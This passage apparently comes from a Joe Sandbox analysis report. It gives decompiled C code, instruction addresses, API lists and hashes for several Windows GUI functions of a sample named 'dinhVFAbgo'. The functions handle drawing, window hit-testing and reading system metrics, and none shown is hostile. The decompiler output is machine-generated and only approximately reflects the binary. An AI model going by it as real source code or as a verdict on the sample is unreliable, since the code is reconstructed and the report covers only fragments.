					if( *((intOrPtr*)(__ecx + 0x18)) == 0) {
						goto L12;
					} else {
						_push(0);
						E00CB90E5(__ebx, _t84 - 0x48, __edx, __ecx, 0, _t87);
						 *((intOrPtr*)(_t84 - 4)) = 0;
						 *((intOrPtr*)(_t84 - 0x10)) = 0;
						 *((intOrPtr*)(_t84 - 0x14)) = 0xe196b4;
						 *((char*)(_t84 - 4)) = 1;
						E00CB9032(_t84 - 0x34);
						 *((char*)(_t84 - 4)) = 2;
						E00CB9032(_t84 - 0x24);
						 *((char*)(_t84 - 4)) = 3;
						E00CB9B84(_t62, _t84 - 0x34, CreateCompatibleDC( *(_t84 - 0x44)));
						E00CB9B84(_t62, _t84 - 0x24, CreateCompatibleDC( *(_t84 - 0x44)));
						_t48 =  *(_t79 + 0x8c);
						if(_t48 == 0) {
							_t63 = 0;
						} else {
							_t63 = SelectObject( *(_t84 - 0x20), _t48);
						}
						if( *(_t84 + 0xc) != 0) {
							_t81 = SelectObject( *(_t84 - 0x30),  *(_t84 + 0xc));
						}
						BitBlt( *(_t84 - 0x20),  *(_t79 + 0x54) *  *(_t84 + 8), 0,  *(_t79 + 0x54),  *(_t79 + 0x58),  *(_t84 - 0x30), 0, 0, 0xcc0020);
						if(_t63 != 0) {
							SelectObject( *(_t84 - 0x20), _t63);
						}
						if(_t81 != 0) {
							SelectObject( *(_t84 - 0x30), _t81);
						}
						_t82 = _t79 + 0x90;
						 *((intOrPtr*)(_t79 + 0x1c)) = 1;
						E00CB83BD(_t79, _t82);
						 *_t82 =  *_t82 & 0x00000000;
						_t83 = _t79 + 0x94;
						E00CB83BD(_t79, _t83);
						 *_t83 =  *_t83 & 0x00000000;
						E00CB91A4(_t84 - 0x24);
						E00CB91A4(_t84 - 0x34);
						 *((intOrPtr*)(_t84 - 0x14)) = 0xe196b4;
						E00CB91F0(_t84 - 0x14, _t77);
						E00CB9360(_t84 - 0x48);
						_t39 = 1;
					}
				}
				return E00DDD4FA(_t39);
			}

0x00cdf6c9
0x00cdf6c9
0x00cdf6c9
0x00cdf6d0
0x00cdf6d5
0x00cdf6d7
0x00cdf6dc
0x00cdf7fe
0x00cdf7fe
0x00cdf7fe
0x00cdf6e2
0x00cdf6e2
0x00cdf6e5
0x00000000
0x00cdf6eb
0x00cdf6eb
0x00cdf6ef
0x00cdf6f4
0x00cdf6f7
0x00cdf6fa
0x00cdf704
0x00cdf708
0x00cdf710
0x00cdf714
0x00cdf71c
0x00cdf72a
0x00cdf73c
0x00cdf741
0x00cdf749
0x00cdf759
0x00cdf74b
0x00cdf755
0x00cdf755
0x00cdf75f
0x00cdf76d
0x00cdf76d
0x00cdf78d
0x00cdf795
0x00cdf79b
0x00cdf79b
0x00cdf7a3
0x00cdf7a9
0x00cdf7a9
0x00cdf7b1
0x00cdf7b9
0x00cdf7bc
0x00cdf7c1
0x00cdf7c4
0x00cdf7cb
0x00cdf7d0
0x00cdf7d6
0x00cdf7de
0x00cdf7e6
0x00cdf7ed
0x00cdf7f5
0x00cdf7fa
0x00cdf7fa
0x00cdf6e5
0x00cdf805

APIs

__EH_prolog3.LIBCMT ref: 00CDF6D0

Part of subcall function 00CB90E5: __EH_prolog3.LIBCMT ref: 00CB90EC
Part of subcall function 00CB90E5: GetWindowDC.USER32(00000000,00000004,00CD9743,00000000), ref: 00CB9118

CreateCompatibleDC.GDI32(?), ref: 00CDF720
CreateCompatibleDC.GDI32(?), ref: 00CDF732
SelectObject.GDI32(?,?), ref: 00CDF74F
SelectObject.GDI32(?,00000000), ref: 00CDF767
BitBlt.GDI32(?,?,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00CDF78D
SelectObject.GDI32(?,00000000), ref: 00CDF79B
SelectObject.GDI32(?,00000000), ref: 00CDF7A9

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ObjectSelect$CompatibleCreateH_prolog3$Window
String ID:
API String ID: 1662780096-0
Opcode ID: ce126ccc503f0358d0bec936acc24b495f9c2ef78142a6b9b0f77b0904543edb
Instruction ID: 98ca41c9b2da9dd33bc58edbb2a295995b3043c4d4c256658c118473643b89a7
Opcode Fuzzy Hash: ce126ccc503f0358d0bec936acc24b495f9c2ef78142a6b9b0f77b0904543edb
Instruction Fuzzy Hash: E1313E31901115EFDB05EFA4DD85AEDBBB9FF18700F144029F64272261DB705E59DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CB869E Relevance: 12.1, APIs: 8, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00CB869E(void* __ebx, struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagPOINT _v32;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t21;
				signed int _t22;
				signed int _t26;
				struct tagPOINT _t39;
				void* _t42;
				signed int _t43;
				struct HWND__* _t44;
				signed int _t45;

				_t37 = __ebx;
				_t19 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t19 ^ _t45;
				_t21 = _a12;
				_t39 = _a8;
				_t44 = _a4;
				_push(_t21);
				_v32.x = _t39;
				_v32.y = _t21;
				_t22 = RealChildWindowFromPoint(_t44, _t39);
				_t43 = _t22;
				if(_t43 == 0) {
					ClientToScreen(_t44,  &_v32);
					_t44 = GetWindow(_t44, 5);
					if(_t44 == 0) {
						L10:
						_t26 = _t43;
						L11:
						return E00DDCBCE(_t26, _t37, _v8 ^ _t45, _t42, _t43, _t44);
					}
					_push(__ebx);
					do {
						if(GetDlgCtrlID(_t44) != 0xffff && (GetWindowLongA(_t44, 0xfffffff0) & 0x10000000) != 0) {
							_v24.left = 0;
							_v24.top = 0;
							_v24.right = 0;
							_v24.bottom = 0;
							GetWindowRect(_t44,  &_v24);
							_push(_v32.y);
							if(PtInRect( &_v24, _v32) != 0) {
								_t43 = _t44;
							}
						}
						_t44 = GetWindow(_t44, 2);
					} while (_t44 != 0);
					_pop(_t37);
					goto L10;
				}
				asm("sbb eax, eax");
				_t26 =  ~(_t22 - _t44) & _t43;
				goto L11;
			}

0x00cb869e
0x00cb86a4
0x00cb86ab
0x00cb86ae
0x00cb86b1
0x00cb86b5
0x00cb86b9
0x00cb86bc
0x00cb86bf
0x00cb86c2
0x00cb86c8
0x00cb86cc
0x00cb86dd
0x00cb86ec
0x00cb86f0
0x00cb8750
0x00cb8750
0x00cb8752
0x00cb875f
0x00cb875f
0x00cb86f2
0x00cb86f5
0x00cb8701
0x00cb8716
0x00cb871b
0x00cb871e
0x00cb8721
0x00cb8724
0x00cb872a
0x00cb873c
0x00cb873e
0x00cb873e
0x00cb873c
0x00cb8749
0x00cb874b
0x00cb874f
0x00000000
0x00cb874f
0x00cb86d2
0x00cb86d4
0x00000000

APIs

RealChildWindowFromPoint.USER32(?,?,?), ref: 00CB86C2
ClientToScreen.USER32(?,?), ref: 00CB86DD
GetWindow.USER32(?,00000005), ref: 00CB86E6
GetDlgCtrlID.USER32 ref: 00CB86F6
GetWindowLongA.USER32 ref: 00CB8706
GetWindowRect.USER32 ref: 00CB8724
PtInRect.USER32(?,?,?), ref: 00CB8734
GetWindow.USER32(00000000,00000002), ref: 00CB8743

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$Rect$ChildClientCtrlFromLongPointRealScreen
String ID:
API String ID: 151369081-0
Opcode ID: da5281a4a73d85242eb5fca30863b65232e722fcbe8765d91c70c5d1e84cc6ca
Instruction ID: fc99bbfc98678bf9b01e56e3d77d4761c4aad7a12b4b6fd9bef4a02ff49fa7a1
Opcode Fuzzy Hash: da5281a4a73d85242eb5fca30863b65232e722fcbe8765d91c70c5d1e84cc6ca
Instruction Fuzzy Hash: 7E21397190151AAFCB118FA99D499EFBBBCAF04740F144169F811F3250DB349A09CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CD8FC9 Relevance: 12.1, APIs: 8, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CD8FC9(void* __ecx) {
				int _t14;
				int _t17;
				void _t19;
				void* _t24;
				void* _t27;
				void* _t28;
				void* _t29;
				void* _t30;

				_t27 = __ecx;
				 *((intOrPtr*)(__ecx + 0xc)) = 1;
				 *((intOrPtr*)(_t27 + 0x114)) = GetSystemMetrics(0x31);
				_t14 = GetSystemMetrics(0x32);
				_t28 = _t27 + 0x16c;
				 *(_t27 + 0x118) = _t14;
				SetRectEmpty(_t28);
				if(EnumDisplayMonitors(0, 0, E00CD8E5F, _t28) == 0) {
					SystemParametersInfoA(0x30, 0, _t28, 0);
				}
				_t17 = 0;
				_t29 = _t27 + 0x190;
				_t24 = _t27 + 0x194;
				 *0xe872d8 = 0;
				 *_t29 = 0;
				 *_t24 = 0;
				if( *((intOrPtr*)(_t27 + 0x180)) == 0) {
					SystemParametersInfoA(0x1002, 0, _t29, 0);
					_t17 = 0;
					if( *_t29 != 0) {
						SystemParametersInfoA(0x1012, 0, _t24, 0);
						_t17 = 0;
					}
				}
				_t30 = _t27 + 0x1a4;
				 *(_t27 + 0x1c8) = _t17;
				 *((intOrPtr*)(_t27 + 0x1a8)) = 1;
				SystemParametersInfoA(0x100a, _t17, _t30, _t17);
				_t19 =  *_t30;
				 *((intOrPtr*)(_t27 + 0xc)) = 0;
				 *(_t27 + 0x1a0) = _t19;
				return _t19;
			}

0x00cd8fcc
0x00cd8fd0
0x00cd8fdf
0x00cd8fe5
0x00cd8feb
0x00cd8ff1
0x00cd8ff8
0x00cd9010
0x00cd9017
0x00cd9017
0x00cd901d
0x00cd901f
0x00cd9025
0x00cd902b
0x00cd9030
0x00cd9032
0x00cd903a
0x00cd9044
0x00cd904a
0x00cd904e
0x00cd9058
0x00cd905e
0x00cd905e
0x00cd904e
0x00cd9061
0x00cd9067
0x00cd9074
0x00cd907e
0x00cd9084
0x00cd9088
0x00cd908b
0x00cd9094

APIs

GetSystemMetrics.USER32 ref: 00CD8FD7
GetSystemMetrics.USER32 ref: 00CD8FE5
SetRectEmpty.USER32(?), ref: 00CD8FF8
EnumDisplayMonitors.USER32(00000000,00000000,00CD8E5F,?,?,00000000,00CD8F8A), ref: 00CD9008
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00CD9017
SystemParametersInfoA.USER32(00001002,00000000,?,00000000), ref: 00CD9044
SystemParametersInfoA.USER32(00001012,00000000,?,00000000), ref: 00CD9058
SystemParametersInfoA.USER32 ref: 00CD907E

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: System$InfoParameters$Metrics$DisplayEmptyEnumMonitorsRect
String ID:
API String ID: 2614369430-0
Opcode ID: c02b21616c5c3dfbbf4f8160c999f0bcca3fdcaf4ea43e6c7aa04ff4d550a4b1
Instruction ID: 1110ee5ccb68325bb21e75b550e0338262800606fa8ee80795b6f39b02b96905
Opcode Fuzzy Hash: c02b21616c5c3dfbbf4f8160c999f0bcca3fdcaf4ea43e6c7aa04ff4d550a4b1
Instruction Fuzzy Hash: 82211AB0201615BFE3154F72DC88AE3FBBCFF09745F00812AE699D6140DBB06954CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CE8F42 Relevance: 10.8, APIs: 7, Instructions: 307
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00CE8F42(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, struct tagRECT _a12, intOrPtr _a16) {
				signed int _v4;
				struct HBRUSH__* _v8;
				char _v12;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				struct tagPOINT _v80;
				struct tagRECT _v96;
				signed int _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				char _v124;
				long _v132;
				long _v136;
				long _v144;
				struct HBRUSH__* _v148;
				char _v152;
				char _v160;
				intOrPtr _t138;
				void* _t144;
				void* _t147;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t169;
				struct HBRUSH__* _t183;
				intOrPtr _t188;
				void* _t189;
				struct HBRUSH__* _t190;
				void* _t203;
				long _t222;
				intOrPtr _t225;
				intOrPtr _t235;
				long _t236;
				intOrPtr _t237;
				void* _t250;
				void* _t251;
				void* _t259;
				intOrPtr _t261;
				intOrPtr _t263;
				long _t267;
				intOrPtr* _t270;
				void* _t273;
				intOrPtr _t275;
				void* _t296;

				_t296 = __fp0;
				_t259 = __edx;
				_push(0x94);
				E00DDD55F(0xe0af97, __ebx, __edi, __esi);
				_v116 = __ecx;
				_t222 = _a12.left;
				_t263 = _a8;
				_v104 = _t263;
				_v136 = _t222;
				_t138 =  *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x88)) + 0x53c));
				_v108 = _t138;
				if(_a16 == 0) {
					L4:
					_t15 =  &_v112;
					 *_t15 = _v112 & 0x00000000;
					__eflags =  *_t15;
					L5:
					 *0xe17a64();
					if( *((intOrPtr*)( *((intOrPtr*)( *_t222 + 0xd4))))() == 0 || ( *(_v108 + 0x330) & 0x00000001) == 0) {
						_t23 =  &_v100;
						 *_t23 = _v100 & 0x00000000;
						__eflags =  *_t23;
					} else {
						_v100 = 1;
					}
					_t270 =  *((intOrPtr*)( *_t222 + 0xd0));
					 *0xe17a64();
					_t144 =  *_t270();
					if(_t144 != 0 || _v100 != _t144) {
						_t270 =  *((intOrPtr*)( *_t222 + 0xe4));
						 *0xe17a64();
						_t147 =  *_t270();
						_t290 = _t147;
						if(_t147 != 0) {
							goto L13;
						}
						_v100 = 1;
						goto L14;
					} else {
						L13:
						_t29 =  &_v100;
						 *_t29 = _v100 & 0x00000000;
						__eflags =  *_t29;
						L14:
						_push( *((intOrPtr*)(E00CC19ED() + 0x58)));
						_push(1);
						_push(0);
						E00CB909B(_t222,  &_v132, _t259, _t263, _t270, _t290);
						_v4 = _v4 & 0x00000000;
						_t235 = E00CBA2B8(_t263,  &_v132);
						_v108 = _t235;
						if(_t235 == 0) {
							E00CAA4E7(_t222, _t235, _t263, _t270, __eflags);
							asm("int3");
							_push(_t235);
							_push(_t235);
							_push(_t270);
							_push(_t263);
							OffsetRect( &_a12, 1, 1);
							__eflags = 0;
							_v12 = 0;
							_v8 = 0;
							E00D09EB6(_t259, 0, _t296, _a4, 2,  &_a12, 3,  &_v12);
							OffsetRect( &_a12, 0xffffffff, 0xffffffff);
							_v12 = 0;
							_v8 = 0;
							return E00D09EB6(_t259, __eflags, _t296, _a4, 2,  &_a12, 0,  &_v12);
						} else {
							_t273 = _t222 + 0x74;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t267 = 0xe19640;
							_t261 = _v96.top + 3;
							_v96.top = _t261;
							_t165 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x88)) + 0x53c)) + 0x2cc));
							if(_t165 <= 0) {
								_t223 = _v104;
							} else {
								asm("cdq");
								_t250 = 0x64;
								_t251 = _t250 - (_t165 - _t261 >> 1);
								_t203 = 0xa;
								_t293 = _t251 - _t203;
								if(_t251 >= _t203) {
									_t203 = _t251;
								}
								_push(E00D0DAAF(_t251,  *((intOrPtr*)(E00CC19ED() + 0x54)), _t203));
								_push(1);
								_push(0);
								E00CB909B(_t222,  &_v144, _t261, _t267, _t273, _t293);
								_t223 = _v104;
								_v4 = 1;
								E00CBA2B8(_v104,  &_v144);
								E00CB9F54(_v104,  &_v160, _v96.right - 1, _v96.top);
								E00CB9F1F(_v104, _v96.right - 1, _v96.bottom);
								_v4 = 0;
								_v144 = _t267;
								E00CB91F0( &_v144, _t261);
								_t261 = _v96.top;
								_t235 = _v108;
							}
							if(_v112 != 0 || _v100 != 0) {
								_t236 = _v96.left;
								_t261 = _t261 + 2;
								_t267 = _v96.bottom;
								_t225 = _v96.right - 2;
								_v120 = _v120 & 0x00000000;
								_t166 = _t236 + 1;
								_v80.x = _t236;
								_v72 = _t166;
								_v64 = _t166;
								_t274 = _t267 - 1;
								_v96.right = _t225;
								_t237 = _v96.top;
								_v56 = _t236 + 3;
								_v48 = _t225 - 3;
								_t169 = _t225 - 1;
								_v80.y = _t267;
								_v68 = _t274;
								_v60 = _t261;
								_v52 = _t237;
								_v44 = _t237;
								_v40 = _t169;
								_v36 = _t261;
								_v32 = _t169;
								_v28 = _t274;
								_v24 = _t225;
								_v20 = _t267;
								_v124 = 0xe1a644;
								_v4 = 2;
								E00CB9BC6(_t225,  &_v124, _t267, CreatePolygonRgn( &_v80, 8, 2));
								__eflags = _v112;
								_t223 = _v104;
								if(_v112 != 0) {
									E00CBA1B1(_t223,  &_v124);
									_t267 = _v136;
									_t183 = E00D5CD14(_t267);
									__eflags = _t183;
									if(_t183 == 0) {
										_t274 =  *((intOrPtr*)( *_v116 + 0x284));
										 *0xe17a64( *((intOrPtr*)( *((intOrPtr*)(_t267 + 0x88)) + 0x19c)));
										_t188 =  *((intOrPtr*)( *((intOrPtr*)( *_v116 + 0x284))))();
									} else {
										_t188 =  *((intOrPtr*)(E00CC19ED() + 0x5c));
									}
									__eflags = _t188 - 0xffffffff;
									if(__eflags == 0) {
										_t189 = E00CC19ED();
										__eflags = _v100;
										if(_v100 == 0) {
											_t190 = _t189 + 0xd0;
											__eflags = _t190;
										} else {
											_t190 = _t189 + 0xc8;
										}
										__eflags = _t190;
										if(_t190 != 0) {
											_t190 =  *(_t190 + 4);
										}
										FillRect( *(_t223 + 4),  &_v96, _t190);
									} else {
										_push(_t188);
										E00CB8F99( &_v152, _t261, _t267, _t274, __eflags);
										FillRect( *(_t223 + 4),  &_v96, _v148);
										_v152 = 0xe1966c;
										E00CB91F0( &_v152, _t261);
									}
									E00CBA1B1(_t223, 0);
								}
								Polyline( *(_t223 + 4),  &_v80, 8);
								E00CBA2B8(_t223, _v108);
								_t275 =  *((intOrPtr*)(E00CC19ED() + 0x68));
								_v124 = 0xe1a644;
								E00CB91F0( &_v124, _t261);
								_v132 = 0xe19640;
							} else {
								E00CBA2B8(_t223, _t235);
								_t275 =  *((intOrPtr*)(E00CC19ED() + 0x68));
								_v132 = _t267;
							}
							E00CB91F0( &_v132, _t261);
							return E00DDD50E(_t223, _t267, _t275);
						}
					}
				}
				if(( *(_t138 + 0x330) & 0x00000001) == 0) {
					L3:
					_v112 = 1;
					goto L5;
				}
				 *0xe17a64();
				if( *((intOrPtr*)( *((intOrPtr*)( *_t222 + 0x1c4))))() == 0) {
					goto L4;
				}
				goto L3;
			}

0x00ce8f42
0x00ce8f42
0x00ce8f42
0x00ce8f4c
0x00ce8f51
0x00ce8f58
0x00ce8f5b
0x00ce8f5e
0x00ce8f61
0x00ce8f6d
0x00ce8f73
0x00ce8f76
0x00ce8fa2
0x00ce8fa2
0x00ce8fa2
0x00ce8fa2
0x00ce8fa6
0x00ce8fb0
0x00ce8fbc
0x00ce8fd3
0x00ce8fd3
0x00ce8fd3
0x00ce8fca
0x00ce8fca
0x00ce8fca
0x00ce8fd9
0x00ce8fe1
0x00ce8fe9
0x00ce8fed
0x00ce8ff6
0x00ce8ffe
0x00ce9006
0x00ce9008
0x00ce900a
0x00000000
0x00000000
0x00ce900c
0x00000000
0x00ce9015
0x00ce9015
0x00ce9015
0x00ce9015
0x00ce9015
0x00ce9019
0x00ce9024
0x00ce9027
0x00ce9029
0x00ce902b
0x00ce9030
0x00ce9042
0x00ce9044
0x00ce9049
0x00ce92c3
0x00ce92c8
0x00ce92cc
0x00ce92cd
0x00ce92ce
0x00ce92d5
0x00ce92db
0x00ce92e4
0x00ce92ec
0x00ce92f3
0x00ce92f6
0x00ce9303
0x00ce930c
0x00ce9314
0x00ce9323
0x00ce904f
0x00ce9055
0x00ce905b
0x00ce905c
0x00ce905d
0x00ce905e
0x00ce9062
0x00ce9067
0x00ce906a
0x00ce9073
0x00ce907b
0x00ce9109
0x00ce9081
0x00ce9081
0x00ce9086
0x00ce9089
0x00ce908d
0x00ce908e
0x00ce9090
0x00ce9092
0x00ce9092
0x00ce90a2
0x00ce90a3
0x00ce90a5
0x00ce90ad
0x00ce90b2
0x00ce90be
0x00ce90c2
0x00ce90d8
0x00ce90e7
0x00ce90f2
0x00ce90f6
0x00ce90fc
0x00ce9101
0x00ce9104
0x00ce9104
0x00ce9110
0x00ce9133
0x00ce9136
0x00ce913c
0x00ce913f
0x00ce9142
0x00ce9146
0x00ce9149
0x00ce914c
0x00ce914f
0x00ce9152
0x00ce9158
0x00ce915b
0x00ce915e
0x00ce9164
0x00ce9167
0x00ce916a
0x00ce916d
0x00ce9170
0x00ce9173
0x00ce9176
0x00ce9179
0x00ce917c
0x00ce917f
0x00ce9182
0x00ce9185
0x00ce9188
0x00ce918b
0x00ce9199
0x00ce91a8
0x00ce91ad
0x00ce91b1
0x00ce91b4
0x00ce91c0
0x00ce91c5
0x00ce91cd
0x00ce91d2
0x00ce91d4
0x00ce91e5
0x00ce91f9
0x00ce9202
0x00ce91d6
0x00ce91db
0x00ce91db
0x00ce9204
0x00ce9207
0x00ce923f
0x00ce9244
0x00ce9248
0x00ce9251
0x00ce9251
0x00ce924a
0x00ce924a
0x00ce924a
0x00ce9256
0x00ce9258
0x00ce925a
0x00ce925a
0x00ce9265
0x00ce9209
0x00ce9209
0x00ce9210
0x00ce9222
0x00ce922e
0x00ce9238
0x00ce9238
0x00ce926f
0x00ce926f
0x00ce927d
0x00ce9288
0x00ce9295
0x00ce9298
0x00ce929f
0x00ce92a4
0x00ce9118
0x00ce911b
0x00ce9125
0x00ce9128
0x00ce9128
0x00ce92b4
0x00ce92c0
0x00ce92c0
0x00ce9049
0x00ce8fed
0x00ce8f7f
0x00ce8f99
0x00ce8f99
0x00000000
0x00ce8f99
0x00ce8f8b
0x00ce8f97
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 00CE8F4C
CreatePolygonRgn.GDI32(?,00000008,00000002), ref: 00CE919E
FillRect.USER32 ref: 00CE9222
FillRect.USER32 ref: 00CE9265
Polyline.GDI32(00000002,?,00000008), ref: 00CE927D
OffsetRect.USER32(00000000,00000001,00000001), ref: 00CE92DB
OffsetRect.USER32(00000000,000000FF,000000FF), ref: 00CE9303

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$FillOffset$CreateH_prolog3_PolygonPolyline
String ID:
API String ID: 2710902255-0
Opcode ID: 870706b8a2a7b3442fa3fa063c77fc76be12608330ac611ebfe8c16a1875a110
Instruction ID: e1523e32c42f62bcf75b3f51aaed1ff097e7b7eabd7ca50a4b55b186efb98756
Opcode Fuzzy Hash: 870706b8a2a7b3442fa3fa063c77fc76be12608330ac611ebfe8c16a1875a110
Instruction Fuzzy Hash: 9AC15C71E002199FDF10DFA5C885BEDBBB9FF48300F14406AE919AB292DB709A49CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00CE8940 Relevance: 10.8, APIs: 7, Instructions: 301
windowCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00CE8940(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28, char _a32, intOrPtr _a40) {
				intOrPtr* _v0;
				signed int _v4;
				signed int _v8;
				signed int _v16;
				signed int _v20;
				struct HICON__* _v24;
				int _v28;
				intOrPtr* _v32;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				intOrPtr _v52;
				intOrPtr* _v56;
				intOrPtr* _v60;
				intOrPtr _t104;
				signed int _t105;
				struct HICON__* _t110;
				signed int _t112;
				signed int _t118;
				signed int _t121;
				signed int _t130;
				signed int _t131;
				intOrPtr* _t143;
				intOrPtr _t144;
				intOrPtr _t145;
				void* _t154;
				void* _t167;
				struct HICON__* _t174;
				int _t176;
				int _t179;
				intOrPtr* _t180;
				signed int _t183;
				signed int _t184;
				signed int _t187;
				signed int _t188;
				struct HDC__* _t189;
				char _t191;
				void* _t192;
				intOrPtr* _t193;
				void* _t194;
				void* _t195;
				intOrPtr* _t200;
				signed int _t201;
				char _t215;
				intOrPtr _t231;
				int _t232;
				void* _t233;
				intOrPtr _t234;
				intOrPtr* _t236;
				intOrPtr* _t237;
				void* _t240;
				intOrPtr _t243;
				intOrPtr* _t244;
				int _t248;
				void* _t250;
				void* _t252;
				intOrPtr* _t258;
				void* _t262;
				void* _t263;
				void* _t266;
				signed int _t267;
				signed int _t269;
				void* _t289;

				_t289 = __fp0;
				_t233 = __edx;
				_t196 = __ecx;
				_t192 = __ebx;
				_push(0x30);
				E00DDD52C(0xe0aef1, __ebx, __edi, __esi);
				_v56 = __ecx;
				_t243 = _a12;
				_t236 = _a8;
				_v60 = _t236;
				_t104 = E00CB277F(__ebx, _t196, _t233, GetParent( *(_t243 + 0x20)));
				_v32 =  *((intOrPtr*)(_t243 + 0x308));
				_v52 = _t104;
				_t105 = E00CB7738(_t104);
				_t274 =  *(_t243 + 0x330) & 0x00000002;
				_v20 = _t105;
				if(( *(_t243 + 0x330) & 0x00000002) != 0) {
					_push(_v52);
					_t174 = E00D53ACD(__ebx, _t236, _t243, _t274);
					_v24 = _t174;
					if(_t174 != 0) {
						_v44 = GetSystemMetrics(0x32);
						_t176 = GetSystemMetrics(0x31);
						_t262 = _a28 - _a20;
						_v48 = _t176;
						if(GetSystemMetrics(4) >= _t262) {
							_t231 = _a20;
							_t179 = _a28 - _t231;
							__eflags = _t179;
						} else {
							_t179 = GetSystemMetrics(4);
							_t231 = _a20;
						}
						_t180 = _t179 + _a16;
						_t263 = _t262 + _t231;
						_v36 = _t180;
						asm("cdq");
						_t183 = _t180 - _a16 - _v48 - _t233;
						_t184 = _t183 >> 1;
						if(_t183 < 0) {
							_t184 = 0;
						}
						_v28 = _t184 + _a16;
						asm("cdq");
						_t187 = _t263 - _t231 - _v44 - _t233;
						_t188 = _t187 >> 1;
						if(_t187 < 0) {
							_t188 = 0;
						}
						_t232 = _t231 + _t188;
						if(_t236 != 0) {
							_t189 =  *(_t236 + 4);
						} else {
							_t189 = 0;
						}
						DrawIconEx(_t189, _v28, _t232, _v24, _v48, _v44, 0, 0, 3);
						_t191 = _v36;
						if(_a32 < _t191) {
							_a32 = _t191;
						}
					}
				}
				_t244 =  *((intOrPtr*)( *_t236 + 0x28));
